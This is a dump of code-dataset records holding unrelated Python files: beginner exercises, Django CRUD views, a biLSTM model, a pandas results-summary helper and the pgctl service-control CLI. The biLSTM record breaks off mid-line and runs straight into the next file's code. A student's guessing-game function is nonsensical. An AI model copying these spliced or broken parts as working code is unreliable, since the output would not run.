\"\"\"\n\n h = bboxes[:, 3] - bboxes[:, 1]\n w = bboxes[:, 2] - bboxes[:, 0]\n max_len = maximum(w, h)\n\n bboxes[:, 0] = round(bboxes[:, 0] - 0.5 * (max_len - w))\n bboxes[:, 1] = round(bboxes[:, 1] - 0.5 * (max_len - h))\n bboxes[:, 2] = bboxes[:, 0] + max_len\n bboxes[:, 3] = bboxes[:, 1] + max_len\n return bboxes","sub_path":"trident/data/bbox_common.py","file_name":"bbox_common.py","file_ext":"py","file_size_in_byte":21136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"88277681","text":"from __future__ import print_function\nimport random\n\n\n\ndef validate():\n guess = 'a' #initialization with a bad guess\n answer = 'hangman word'\n while guess not in answer:\n guess = raw_input( 'Name a letter in \\ ''+answer+\\': ')\n print('Thank you!')\n \n \ndef guess_winner(players=('Amy', 'Bill', 'Cathy', 'Dale')):\n ''' This function guesses who will be the winner out of\n the four given names\n \n The arguments include 'Amy', 'Bill', 'Cathy', and 'Dale'.\n The code will decide who is the winner based on a guesss.\n '''\n \n winner = random.choice(players)\n \n ####\n # Now the code will begin to choose the winner\n ####\n \n print('Guess which of these people won the lottery: ',end='')\n for p in players[:len(players)-1]: # The code will tell who has\n # won the game and will say and will print \"Guess which of\n # these people won the lottery: [Name], end.\n \n print(p,', ', end='')\n print(players[len(players)-1]) # This line of code will print\n # 'p, [Name of winner] minus the 's' in 'players'.\n \n \n ####\n # The following section of code will allow the coder to guess\n # a number which will, in turn, print 'Guess again!'.\n # If the user guesses '+= 1' then the code will print\n # 'You guessed in', guesses, 'guesses!' and will return guesses.\n ####\n \n guesses = 1\n while raw_input() != winner:\n print('Guess again!')\n guesses += 1\n print('You guessed in', guesses, 'guesses!')\n return guesses\n \n \n \ndef goguess():\n \n print('I have a number between 1 and 20 inclusive.')\n \n number = goguess\n \n while number in goguess() == goguess:\n print('number is too high' or 'number is too low')\n \n while number in goguess() != goguess:\n print ('Right! My number is !' 'You guessed in ', number, 'guesses!')","sub_path":"1.3/1.3.8/LEpperson138.py","file_name":"LEpperson138.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"545645916","text":"i = int(input())\nwhile i != -1:\n miles = 0\n previous_time = 0\n while i > 0:\n time = list(map(int, input().split()))\n time_traveled = time[1] - previous_time\n previous_time = time[1]\n miles += time[0]*time_traveled\n i -= 1\n print('%d miles' % miles)\n i = int(input())\n","sub_path":"python/speed_limit.py","file_name":"speed_limit.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"270545903","text":"from django.shortcuts import render, redirect\nfrom .models import Board\n\n# Create your views here.\n# 게시글 제목, 내용, 작성자\n\ndef index(request) : \n # Board 모델에 담긴 모든 글들을 가져와서 보여줌\n boards = Board.objects.all()\n context = {\n 'boards' : boards\n }\n return render(request, 'index.html', context)\n\ndef new(request) :\n return render(request, 'new.html')\n\ndef create(request) : \n title = request.GET['title']\n contents = request.GET['contents']\n creator = request.GET['creator']\n \n new_board = Board(title=title, contents=contents, creator=creator)\n #데이터 베이스에 저장\n #new_board.save() save까지 한번에 \n\n new_board = Board.objects.create(title=title, contents=contents, creator=creator)\n return redirect(f'/boards/{new_board.id}')\n\ndef show(request, id) :\n # 값을 찾는것 filter\n board = Board.objects.get(id=id)\n context = {\n 'board' : board\n }\n return render(request, 'show.html', context)\n\ndef edit(request, id):\n # 원래 있던 내용이 들어있는 Form\n board = Board.objects.get(id=id)\n context = {\n 'board' : board\n }\n return render(request, 'edit.html', context)\n\n# 원래 있던 내용을 바꿔서 해당 row에 삽입\ndef update(request, id):\n # 실제로 update가 일어나는 곳\n board = Board.objects.get(id=id)\n title = request.GET['title']\n contents = request.GET['contents']\n \n board.title = title\n board.contents = contents\n board.save()\n\n context = {\n 'board' : board\n } \n return redirect(f'/boards/{board.id}')\n\ndef delete(request,id):\n board = Board.objects.get(id=id)\n board.delete()\n return redirect('/boards')","sub_path":"Day8/crudtest/boards/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"41375611","text":"'''\nModel3:\ntime-batched biLSTM\nno stacked layer\nfor multiclass classification\n'''\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass BiDirTBLSTM(nn.Module):\n\tdef __init__(self, vocab_size, embedding_dim, n_classes,rnn_hidden_size, batch_size, n_layers = 1, pbatch_size=1, seq_len=500):\n\t\tsuper(BiDirTBLSTM, self).__init__()\n\t\tself.vocab_size = vocab_size\n\t\tself.embedding_dim = embedding_dim\n\t\tself.n_classes = n_classes\n\t\tself.rnn_hidden_size = rnn_hidden_size\n\t\tself.n_layers = n_layers\n\t\tself.pbatch_size = pbatch_size\n\t\tself.batch_size = batch_size\n\t\tself.seq_len = seq_len\n\n\t\tself.word_embeddings = nn.Embedding(vocab_size, embedding_dim)\n\n\t\t#TB\n\t\tself.tb_size = self.seq_len // self.pbatch_size\n\t\tassert(self.tb_size str:\r\n '''\r\n Provides a common method and format of creating and referencing columns with an index in the label.\r\n \r\n Args:\r\n label: The base label for the column without the index.\r\n index: The index of the column name.\r\n \r\n Returns:\r\n The concatenated label with index in a standard format.\r\n e.g. 'Geometric Mean Sample 7'\r\n '''\r\n return '{0} {1}'.format(label, index)\r\n\r\ndef get_results_list(model_dict: dict) -> list:\r\n '''\r\n Creates list of objects from a dictionary.\r\n \r\n Args:\r\n model_dict: Dictionary object.\r\n \r\n Returns:\r\n A list of objects from the dictionary.\r\n '''\r\n model_list = []\r\n for value in model_dict.values():\r\n model_list.append(value)\r\n return model_list \r\n\r\ndef get_hold_period_from_model_id(model_id: str) -> int:\r\n '''\r\n Parses the model_id to get the hold_period.\r\n \r\n Args:\r\n model_id: Unique ID from the model results dictionary.\r\n \r\n Returns:\r\n The hold period from the model_id.\r\n '''\r\n return int(model_id.split('-')[2])\r\n\r\ndef get_mean_profit_and_total_num_of_sales(model_results_dict: dict, profit_label: str) -> tuple:\r\n ''' \r\n Returns tuple of mean profit and total sales.\r\n \r\n Args:\r\n model_results_dict: the dictionary of dictionaries of DataFrames representing our raw data. The top level \r\n categories represent individual model runs, with unique model_ids for each model. The next level represents \r\n results broken down by individual groups (e.g. stock symbols).\r\n profit_label: The column label for profit.\r\n \r\n Returns: \r\n Tuple of mean profit (float) and total sales (int) - a sale being defined as profit != None.\r\n '''\r\n results_list = get_results_list(model_results_dict)\r\n concat_df = pd.concat(results_list, sort=False, ignore_index = True)[profit_label]\r\n profit_total = 0\r\n num_of_sales = 0\r\n for i in range(len(concat_df)):\r\n if concat_df.at[i] != None:\r\n if np.isnan(concat_df.at[i]):\r\n raise Exception(\"NaN values found in {0} - data should be pre-filtered.\".format(profit_label))\r\n profit_total += concat_df.at[i]\r\n num_of_sales += 1\r\n return profit_total / num_of_sales, num_of_sales\r\n\r\ndef get_mean_profit_per_day(mean_profit: float, hold_period: int) -> float:\r\n ''' \r\n Args:\r\n mean_profit: Mean_profit per buy/sell transaction.\r\n hold_period: Number of days to hold before selling.\r\n \r\n Returns:\r\n The mean profit earned per day over the hold period\r\n '''\r\n return mean_profit / hold_period \r\n\r\nclass SummaryResults:\r\n '''\r\n Used for generating and manipulating a DataFrame of summary results/statistics from our raw model results.\r\n \r\n Note:\r\n An object of this class should be generated using one of the class's classmethods.\r\n \r\n Args:\r\n summary_df: the DataFrame containing the object's summary results/statistics.\r\n model_results_dict: the dictionary of dictionaries of DataFrames representing our raw data. The top level \r\n categories represent individual model runs, with unique model_ids for each model. The next level represents \r\n results broken down by individual groups (e.g. stock symbols).\r\n \r\n Example:\r\n {\r\n '55-7-14': \r\n {\r\n 'A': pd.DataFrame\r\n }\r\n }\r\n '''\r\n MEAN_PROFIT_LABEL = 'Mean Profit'\r\n TOTAL_SALES_COUNT_LABEL = 'Total Sales Count'\r\n MEAN_PROFIT_PER_DAY_LABEL = 'Mean Profit Per Day'\r\n GEOMETRIC_MEAN_LABEL = 'Geometric Mean'\r\n COMPOUND_INVESTMENT_SAMPLE_BASE_LABEL = 'Compound Investment Sample'\r\n COMPOUND_INVESTMENT_SAMPLES_MEAN = 'Compound Investment Sample Mean'\r\n TRUE_POSITIVE_LABEL = 'True Positive'\r\n FALSE_POSITIVE_LABEL = 'False Positive'\r\n FALSE_NEGATIVE_LABEL = 'False Negative'\r\n TRUE_NEGATIVE_LABEL = 'True Negative'\r\n \r\n def __init__(self, summary_df: pd.DataFrame, results_dict: dict):\r\n self.summary_df = summary_df\r\n self.results_dict = results_dict\r\n \r\n @classmethod\r\n def from_model_results(cls, model_results_dict: dict, profit_label: str) -> SummaryResults:\r\n '''\r\n Creates a SummaryResults object from experiment results by running analyses\r\n and constructing the internal DataFrame. The default DataFrame constructed in this method\r\n should not contain columns that are not always useful, in order to reduce clutter and reduce \r\n time spent constructing the basic SummaryResults DataFrame. Additional columns can be added \r\n through additional SummaryResults methods.\r\n \r\n Args:\r\n results: The results output DataFrame from an experiment model. \r\n profit_label: The column label for profit.\r\n \r\n Returns:\r\n SummaryResults object.\r\n '''\r\n summary_df = pd.DataFrame(index = list(model_results_dict.keys()))\r\n \r\n # Create new empty columns\r\n summary_df[cls.MEAN_PROFIT_LABEL] = np.float(0)\r\n summary_df[cls.TOTAL_SALES_COUNT_LABEL] = np.int(0)\r\n summary_df[cls.MEAN_PROFIT_PER_DAY_LABEL] = np.float(0)\r\n \r\n summary_results = cls(summary_df, model_results_dict)\r\n \r\n # Assign values to those columns row by row\r\n for model_id in model_results_dict.keys():\r\n mean_profit_and_total_sales = get_mean_profit_and_total_num_of_sales(model_results_dict[model_id], profit_label)\r\n summary_df.at[model_id, cls.MEAN_PROFIT_LABEL] = mean_profit_and_total_sales[0]\r\n summary_df.at[model_id, cls.TOTAL_SALES_COUNT_LABEL] = mean_profit_and_total_sales[1]\r\n hold_period = get_hold_period_from_model_id(model_id)\r\n summary_df.at[model_id, cls.MEAN_PROFIT_PER_DAY_LABEL] = get_mean_profit_per_day(mean_profit_and_total_sales[0], \r\n hold_period)\r\n \r\n return summary_results\r\n \r\n @classmethod\r\n def from_json_file(cls, summary_filepath: str = None, original_results_filepath: str = None) -> SummaryResults:\r\n '''\r\n Loads a saved SummaryResults object from a saved file. Can optionally load the original results DataFrame\r\n used for calculating the SummaryResults DataFrame if it is available.\r\n Note: the original results DataFrame is required for doing additional analysis.\r\n \r\n Args:\r\n summary_filepath: The path for saved ResultsSummary json data.\r\n original_results_filepath: The path for saved original results json data (optional).\r\n \r\n Returns:\r\n SummaryResults object.\r\n '''\r\n summary_df = None\r\n results_dict = None\r\n \r\n # Load summary results dataframe\r\n try:\r\n summary_df = pd.read_json(summary_filepath)\r\n except ValueError as e:\r\n print(\"Invalid filepath '{0}'.\".format(summary_filepath))\r\n raise e\r\n if original_results_filepath is not None:\r\n # Load original results dictionary of dictionaries of DataFrames\r\n raise NotImplementedError(\"Original results loading is not yet implemented. This feature is still under development.\")\r\n \r\n return cls(summary_df, results_dict)\r\n \r\n @timer_dec\r\n def add_confusion_matrix_stats(self, true_model_id: str, final_classifier_label: str):\r\n '''\r\n Adds the confusion matrix stats:\r\n True Positives,\r\n False Positives, \r\n False negatives, \r\n True Negatives\r\n The default value for each is set to 0 and remains unchanges for the true_model referenced by the true_model_id.\r\n \r\n Args:\r\n control_model_id: The model_id of the control run to treat as the true case.\r\n '''\r\n self.summary_df[self.TRUE_POSITIVE_LABEL] = np.int(0)\r\n self.summary_df[self.FALSE_POSITIVE_LABEL] = np.int(0)\r\n self.summary_df[self.FALSE_NEGATIVE_LABEL] = np.int(0)\r\n self.summary_df[self.TRUE_NEGATIVE_LABEL] = np.int(0)\r\n \r\n true_model_stock_list = get_results_list(self.results_dict[true_model_id])\r\n true_model_concat_results = pd.concat(true_model_stock_list, ignore_index = True)\r\n \r\n for model_id in self.results_dict:\r\n if model_id == true_model_id:\r\n print(\"Skipping {0}\".format(model_id))\r\n continue\r\n print(\"Checking {0}\".format(model_id))\r\n \r\n model_stock_list = get_results_list(self.results_dict[model_id])\r\n model_concat_results = pd.concat(model_stock_list, ignore_index = True)\r\n \r\n true_positive_count = 0\r\n false_positive_count = 0\r\n false_negative_count = 0\r\n true_negative_count = 0\r\n for i in true_model_concat_results.index:\r\n if true_model_concat_results.at[i, final_classifier_label] == True and model_concat_results.at[i, final_classifier_label] == True:\r\n true_positive_count += 1\r\n elif true_model_concat_results.at[i, final_classifier_label] == False and model_concat_results.at[i, final_classifier_label] == True:\r\n false_positive_count += 1\r\n elif true_model_concat_results.at[i, final_classifier_label] == True and model_concat_results.at[i, final_classifier_label] == False:\r\n false_negative_count += 1\r\n elif true_model_concat_results.at[i, final_classifier_label] == False and model_concat_results.at[i, final_classifier_label] == False:\r\n true_negative_count += 1\r\n \r\n self.summary_df.at[model_id, self.TRUE_POSITIVE_LABEL] = true_positive_count\r\n self.summary_df.at[model_id, self.FALSE_POSITIVE_LABEL] = false_positive_count\r\n self.summary_df.at[model_id, self.FALSE_NEGATIVE_LABEL] = false_negative_count\r\n self.summary_df.at[model_id, self.TRUE_NEGATIVE_LABEL] = true_negative_count\r\n \r\n @timer_dec\r\n def add_geometric_mean(self, profit_label: str):\r\n '''\r\n Adds the geometric mean for the whole results_dict dataset.\r\n \r\n Args:\r\n profit_label: The column label for profits in the results_dict.\r\n '''\r\n self.summary_df[self.GEOMETRIC_MEAN_LABEL] = np.float\r\n for model_id in self.results_dict:\r\n model_list = get_results_list(self.results_dict[model_id])\r\n concat_results = pd.concat(model_list)\r\n self.summary_df.at[model_id, self.GEOMETRIC_MEAN_LABEL] = gmean(concat_results[profit_label].dropna().values.astype(np.float64) + 1)\r\n \r\n @timer_dec\r\n def add_compound_investment_samples(self, profit_label: str, date_label: str, num_of_samples: int = 5, cost_per_sale: float = 0.01):\r\n ''' \r\n Adds the compounded geometric returns of a realistic investment sample.\r\n This compounds over the available number of investment periods, based upon run_df length and hold_period.\r\n \r\n Args:\r\n profit_label: The column label for profits in the results_dict.\r\n date_label: The column label for dates in the results_dict.\r\n num_of_samples: Number of random samples to add to the DataFrame.\r\n cost_per_sale: The additional cost (loss) per buy/sell transaction pair.\r\n '''\r\n def get_sample(date_grouped_filtered_results: pd.core.groupby.groupby.DataFrameGroupBy, hold_period: int) -> float:\r\n ''' \r\n Iterate over the date groups, which should be pre-filtered to only include relevant results (i.e. results rows with a stock sale), \r\n selecting one at random from a group of dates, and then jumping hold_period days to select the next one \r\n This effectively models the time between buying and selling one investment at a time with one principal amount).\r\n NOTE: this is not precise on sparse data sets (i.e. fewer buy/sell opportunities), because they are less \r\n likely to have buy/sell opportunities on all days. Therefore mapping days with investment opportunities to hold_days is \r\n not 1:1 when the data is sparse. E.g. holding for 2 days (Mon-Wed) may actually end up holding for 3 days on sparse \r\n results data because there is no investment opportunity on Wed, so the next date group will be on Thurs, consequently \r\n leading to the possibility of fewer investments made within the compounding period. However, this is relatively fast for \r\n generating a large number of samples.\r\n '''\r\n counter = 0\r\n geometric_mean = 1\r\n for name, group in date_grouped_filtered_results:\r\n # Reset the index so we can use .at to select an item at random\r\n group = group.reset_index()\r\n if counter % hold_period == 0:\r\n items_in_group = len(group)\r\n geometric_multiplier = group.at[randint(0, items_in_group - 1), profit_label] + 1 - cost_per_sale\r\n geometric_mean *= geometric_multiplier \r\n counter += 1\r\n return geometric_mean\r\n \r\n # Add num_of_samples geometric mean samples columns to df\r\n for i in range(num_of_samples):\r\n # Get a unique column name\r\n print(\"Getting unique column name...\")\r\n name_index = i\r\n while get_indexed_column_name(self.COMPOUND_INVESTMENT_SAMPLE_BASE_LABEL, name_index) in self.summary_df.columns:\r\n name_index += 1\r\n column_name = get_indexed_column_name(self.COMPOUND_INVESTMENT_SAMPLE_BASE_LABEL, name_index)\r\n print(\"Done getting unique column name {0}.\".format(column_name))\r\n # Create empty column\r\n self.summary_df[column_name] = np.float\r\n # Iterate through each run\r\n for model_id in self.results_dict:\r\n print(\"Adding samples for {0}...\".format(model_id))\r\n # Convert the run dictionary into a list\r\n results_list = get_results_list(self.results_dict[model_id])\r\n # Concatenate it and group by date\r\n concat_results = pd.concat(results_list, sort=False)\r\n concat_filtered_results = concat_results.dropna()\r\n date_grouped_filtered_results = concat_filtered_results.groupby(date_label)\r\n self.summary_df.at[model_id, column_name] = get_sample(date_grouped_filtered_results, \r\n get_hold_period_from_model_id(model_id))\r\n print(\"Done adding samples for {0}.\".format(model_id))\r\n \r\n self._calculate_mean_of_compound_investment_samples()\r\n \r\n @timer_dec\r\n def _calculate_mean_of_compound_investment_samples(self):\r\n ''' \r\n This automatically looks at the number of geometric mean runs in self.summary_df and calculates the arithmetic mean. \r\n '''\r\n num_of_samples = 0\r\n for key in self.summary_df:\r\n if self.COMPOUND_INVESTMENT_SAMPLE_BASE_LABEL in key:\r\n num_of_samples += 1\r\n print(\"Calculating mean of geometric mean samples...\")\r\n self.summary_df[self.COMPOUND_INVESTMENT_SAMPLES_MEAN] = self.summary_df[\r\n [get_indexed_column_name(self.COMPOUND_INVESTMENT_SAMPLE_BASE_LABEL, i) for i in range(num_of_samples)]].mean(1)\r\n print(\"Done calculating mean of geometric mean samples.\")\r\n \r\n def __repr__(self):\r\n '''\r\n Calls internal DataFrame's __repr__ method.\r\n \r\n Returns:\r\n self.summary_df.__repr__()\r\n '''\r\n return self.summary_df.__repr__()\r\n \r\n def __str__(self):\r\n '''\r\n Calls internal DataFrame's __str__ method.\r\n \r\n Returns:\r\n self.summary_df.__str__()\r\n '''\r\n return self.summary_df.__str__()\r\n \r\n def write_to_json_file(self, summary_filepath: str, original_results_filepath: str = None):\r\n '''\r\n Saves the SummaryResults to a json file. Optionally can also save the original results DataFrame\r\n Note: the original results DataFrame is required for doing additional analysis.\r\n \r\n Args:\r\n summary_filepath: The path to save ResultsSummary json data to.\r\n original_results_filepath: The path to save original results json data to (optional).\r\n '''\r\n # Save summary results DataFrame\r\n try:\r\n self.summary_df.to_json(summary_filepath)\r\n except OSError as e:\r\n print(\"Invalid filepath '{0}'.\".format(summary_filepath))\r\n raise e\r\n if original_results_filepath is not None:\r\n # Save original results dictionary of dictionaries of DataFrames\r\n raise NotImplementedError(\"Original results saving is not yet implemented. This feature is still under development.\")\r\n ","sub_path":"results_helper.py","file_name":"results_helper.py","file_ext":"py","file_size_in_byte":17513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"435847653","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport argparse\nimport os\nimport subprocess\nimport time\nfrom time import time as now\n\nimport six\nfrom cached_property import cached_property\nfrom frozendict import frozendict\nfrom py._path.local import LocalPath as Path\n\nfrom .config import Config\nfrom .configsearch import search_parent_directories\nfrom .daemontools import SvStat\nfrom .debug import debug\nfrom .debug import trace\nfrom .errors import CircularAliases\nfrom .errors import NoPlayground\nfrom .errors import PgctlUserMessage\nfrom .errors import Unsupervised\nfrom .functions import bestrelpath\nfrom .functions import commafy\nfrom .functions import exec_\nfrom .functions import JSONEncoder\nfrom .functions import unique\nfrom .service import Service\nfrom pgctl import __version__\n\n\nXDG_RUNTIME_DIR = os.environ.get('XDG_RUNTIME_DIR') or '~/.run'\nALL_SERVICES = '(all services)'\nPGCTL_DEFAULTS = frozendict({\n # TODO-DOC: config\n # where do our services live?\n 'pgdir': 'playground',\n # where does pgdir live?\n 'pghome': os.path.join(XDG_RUNTIME_DIR, 'pgctl'),\n # which services are we acting on?\n 'services': ('default',),\n # how long do we wait for them to come down/up?\n 'timeout': '2.0',\n 'poll': '.01',\n # what are the named groups of services?\n 'aliases': frozendict({\n 'default': (ALL_SERVICES,)\n }),\n})\nCHANNEL = '[pgctl]'\n\n\nclass StateChange(object):\n\n def __init__(self, service):\n self.service = service\n self.name = service.name\n\n\nclass Start(StateChange):\n\n def change(self):\n return self.service.start()\n\n def assert_(self):\n return self.service.assert_ready()\n\n def get_timeout(self):\n return self.service.timeout_ready\n\n class strings(object):\n change = 'start'\n changing = 'Starting:'\n changed = 'Started:'\n\n\nclass Stop(StateChange):\n\n def change(self):\n return self.service.stop()\n\n def assert_(self):\n return self.service.assert_stopped()\n\n def get_timeout(self):\n return self.service.timeout_stop\n\n class strings(object):\n change = 'stop'\n changing = 'Stopping:'\n changed = 'Stopped:'\n\n\ndef pgctl_print(*print_args, **print_kwargs):\n from sys import stderr\n print_kwargs.setdefault('file', stderr)\n print(CHANNEL, *print_args, **print_kwargs)\n stderr.flush()\n\n\ndef timeout(service_name, error, action_name, start_time, timeout_length, check_time):\n curr_time = now()\n check_length = curr_time - check_time\n next_time = curr_time + check_length\n limit_time = start_time + timeout_length\n\n # assertion can take a long time. we timeout as close to the limit_time as we can.\n if abs(curr_time - limit_time) < abs(next_time - limit_time):\n actual_timeout_length = curr_time - start_time\n error_message = \"ERROR: service '{}' failed to {} after {:.2f} seconds\".format(\n service_name,\n action_name,\n actual_timeout_length,\n )\n if actual_timeout_length - timeout_length > 0.1:\n error_message += ' (it took {}s to poll)'.format(\n check_length,\n ) # TODO-TEST: pragma: no cover: we only hit this when lsof is being slow; add a unit test\n error_message += ', ' + str(error)\n pgctl_print(error_message)\n return True\n else:\n trace('service %s still waiting: %.1f seconds.', service_name, limit_time - curr_time)\n return False\n\n\nclass PgctlApp(object):\n\n def __init__(self, config=PGCTL_DEFAULTS):\n self.pgconf = frozendict(config)\n\n def __call__(self):\n \"\"\"Run the app.\"\"\"\n # config guarantees this is set\n command = self.pgconf['command']\n # argparse guarantees this is an attribute\n command = getattr(self, command)\n try:\n result = command()\n except PgctlUserMessage as error:\n # we don't need or want a stack trace for user errors\n result = str(error)\n\n if isinstance(result, six.string_types):\n return CHANNEL + ' ERROR: ' + result\n else:\n return result\n\n def __change_state(self, state):\n \"\"\"Changes the state of a supervised service using the svc command\"\"\"\n # if we're starting a service, run the playground-wide \"pre-start\" hook (if it exists)\n if state is Start:\n self.run_pre_start_hook()\n\n # we lock the whole playground; only one pgctl can change the state at a time, reliably\n def on_lock_held(path):\n from .errors import reraise\n from .errors import LockHeld\n from .functions import ps\n from .fuser import fuser\n reraise(LockHeld(\n 'another pgctl command is currently managing this service: (%s)\\n%s' %\n (bestrelpath(path), ps(fuser(path)))\n ))\n\n from contextlib2 import ExitStack\n with ExitStack() as context:\n for service in self.services:\n service.ensure_exists()\n\n # This lock represents a pgctl cli interacting with the service.\n from .flock import flock\n lock = context.enter_context(flock(\n service.path.join('.pgctl.lock').strpath,\n on_fail=on_lock_held,\n ))\n from .flock import set_fd_inheritable\n set_fd_inheritable(lock, False)\n\n return self.__locked_change_state(state)\n\n def __locked_change_state(self, state):\n \"\"\"the critical section of __change_state\"\"\"\n pgctl_print(state.strings.changing, commafy(self.service_names))\n services = [state(service) for service in self.services]\n failed = []\n start_time = now()\n while services:\n for service in services:\n try:\n service.change()\n except Unsupervised:\n pass # handled in state assertion, below\n for service in tuple(services):\n check_time = now()\n try:\n service.assert_()\n except PgctlUserMessage as error:\n if timeout(service.name, error, state.strings.change, start_time, service.get_timeout(), check_time):\n services.remove(service)\n failed.append(service.name)\n else:\n # TODO: debug() takes a lambda\n debug('loop: check_time %.3f', now() - check_time)\n pgctl_print(state.strings.changed, service.name)\n service.service.message(state)\n services.remove(service)\n\n time.sleep(float(self.pgconf['poll']))\n\n return failed\n\n def run_pre_start_hook(self):\n \"\"\"Run the playground-wide pre-start hook, if it exists.\"\"\"\n try:\n path = self.pgdir.join('pre-start')\n if path.exists():\n subprocess.check_call(\n (path.strpath,),\n cwd=self.pgdir.dirname,\n )\n except NoPlayground:\n # services can exist without a playground;\n # that's fine, but they can't have pre-start hooks\n pass\n\n def with_services(self, services):\n \"\"\"return a similar PgctlApp, but with a different set of services\"\"\"\n newconf = dict(self.pgconf)\n newconf['services'] = services\n return PgctlApp(newconf)\n\n def __show_failure(self, state, failed):\n if not failed:\n return\n\n failapp = self.with_services(failed)\n childpid = os.fork()\n if childpid:\n os.waitpid(childpid, 0)\n else:\n os.dup2(2, 1) # send log to stderr\n failapp.log(interactive=False) # doesn't return\n if state == 'start':\n # we don't want services that failed to start to be 'up'\n failapp.stop()\n\n pgctl_print()\n pgctl_print('There might be useful information further up in the log; you can view it by running:')\n for service in failapp.services:\n pgctl_print(' less +G {}'.format(bestrelpath(service.path.join('log').strpath)))\n\n raise PgctlUserMessage('Some services failed to %s: %s' % (state, commafy(failed)))\n\n def start(self):\n \"\"\"Idempotent start of a service or group of services\"\"\"\n failed = self.__change_state(Start)\n return self.__show_failure('start', failed)\n\n def stop(self):\n \"\"\"Idempotent stop of a service or group of services\"\"\"\n failed = self.__change_state(Stop)\n return self.__show_failure('stop', failed)\n\n def status(self):\n \"\"\"Retrieve the PID and state of a service or group of services\"\"\"\n for service in self.services:\n status = service.svstat()\n if status.state == SvStat.UNSUPERVISED:\n # this is the expected state for down services.\n status = status._replace(state='down')\n print('%s: %s' % (service.name, status))\n\n def restart(self):\n \"\"\"Starts and stops a service\"\"\"\n self.stop()\n self.start()\n\n def reload(self):\n \"\"\"Reloads the configuration for a service\"\"\"\n pgctl_print('reload:', commafy(self.service_names))\n raise PgctlUserMessage('reloading is not yet implemented.')\n\n def log(self, interactive=None):\n \"\"\"Displays the stdout and stderr for a service or group of services\"\"\"\n # TODO(p3): -n: send the value to tail -n\n # TODO(p3): -f: force iteractive behavior\n # TODO(p3): -F: force iteractive behavior off\n tail = ('tail', '-n', '30', '--verbose') # show file headers\n\n if interactive is None:\n import sys\n interactive = sys.stdout.isatty()\n if interactive:\n # we're interactive; give a continuous log\n # TODO-TEST: pgctl log | pb should be non-interactive\n tail += ('--follow=name', '--retry')\n\n logfiles = []\n for service in self.services:\n service.ensure_logs()\n logfile = service.path.join('log')\n logfile = bestrelpath(str(logfile))\n logfiles.append(logfile)\n exec_(tail + tuple(logfiles)) # never returns\n\n def debug(self):\n \"\"\"Allow a service to run in the foreground\"\"\"\n try:\n # start supervise in the foreground with the service up\n service, = self.services # pylint:disable=unpacking-non-sequence\n except ValueError:\n raise PgctlUserMessage(\n 'Must debug exactly one service, not: ' + commafy(self.service_names),\n )\n\n self.stop()\n service.foreground() # never returns\n\n def config(self):\n \"\"\"Print the configuration for a service\"\"\"\n print(JSONEncoder(sort_keys=True, indent=4).encode(self.pgconf))\n\n def service_by_name(self, service_name):\n \"\"\"Return an instantiated Service, by name.\"\"\"\n if os.path.isabs(service_name):\n path = Path(service_name)\n else:\n path = self.pgdir.join(service_name, abs=1)\n return Service(\n path,\n self.pghome.join(path.relto(str('/')), abs=1),\n self.pgconf['timeout'],\n )\n\n @cached_property\n def services(self):\n \"\"\"Return a tuple of the services for a command\n\n :return: tuple of Service objects\n \"\"\"\n services = [\n self.service_by_name(service_name)\n for alias in self.pgconf['services']\n for service_name in self._expand_aliases(alias)\n ]\n return unique(services)\n\n def _expand_aliases(self, name):\n aliases = self.pgconf['aliases']\n visited = set()\n stack = [name]\n result = []\n\n while stack:\n name = stack.pop()\n if name == ALL_SERVICES:\n result.extend(self.all_service_names)\n elif name in visited:\n raise CircularAliases(\"Circular aliases! Visited twice during alias expansion: '%s'\" % name)\n else:\n visited.add(name)\n if name in aliases:\n stack.extend(reversed(aliases[name]))\n else:\n result.append(name)\n\n return result\n\n @cached_property\n def all_service_names(self):\n \"\"\"Return a tuple of all of the Services.\n\n :return: tuple of strings -- the service names\n \"\"\"\n pgdir = self.pgdir.listdir(sort=True)\n\n return tuple(\n service_path.basename\n for service_path in pgdir\n if service_path.check(dir=True)\n )\n\n @cached_property\n def service_names(self):\n return tuple([service.name for service in self.services])\n\n @cached_property\n def pgdir(self):\n \"\"\"Retrieve the set playground directory\"\"\"\n for parent in search_parent_directories():\n pgdir = Path(parent).join(self.pgconf['pgdir'], abs=1)\n if pgdir.check(dir=True):\n return pgdir\n raise NoPlayground(\n \"could not find any directory named '%s'\" % self.pgconf['pgdir']\n )\n\n @cached_property\n def pghome(self):\n \"\"\"Retrieve the set pgctl home directory.\n\n By default, this is \"$XDG_RUNTIME_DIR/pgctl\".\n \"\"\"\n return Path(self.pgconf['pghome'], expanduser=True)\n\n commands = (start, stop, status, restart, reload, log, debug, config)\n\n\ndef parser():\n commands = [command.__name__ for command in PgctlApp.commands]\n parser = argparse.ArgumentParser()\n parser.add_argument('--version', action='version', version=__version__)\n parser.add_argument('--pgdir', help='name the playground directory', default=argparse.SUPPRESS)\n parser.add_argument('--pghome', help='directory to keep user-level playground state', default=argparse.SUPPRESS)\n parser.add_argument('command', help='specify what action to take', choices=commands, default=argparse.SUPPRESS)\n\n group = parser.add_mutually_exclusive_group()\n group.add_argument(\n '--all', '-a',\n action='store_const', const=(ALL_SERVICES,),\n dest='services',\n help='act upon all services',\n default=argparse.SUPPRESS,\n )\n group.add_argument('services', nargs='*', help='specify which services to act upon', default=argparse.SUPPRESS)\n\n return parser\n\n\ndef main(argv=None):\n p = parser()\n args = p.parse_args(argv)\n config = Config('pgctl')\n config = config.combined(PGCTL_DEFAULTS, args)\n app = PgctlApp(config)\n\n return app()\n\n\nif __name__ == '__main__':\n exit(main())\n","sub_path":"pgctl/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":14824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"476838941","text":"amount = eval(input(\"Enter the initial deposit amount: \"))\namount = int(amount)\n\ninterest = eval(input(\"Enter annual percentage yield: \"))\ninterest = 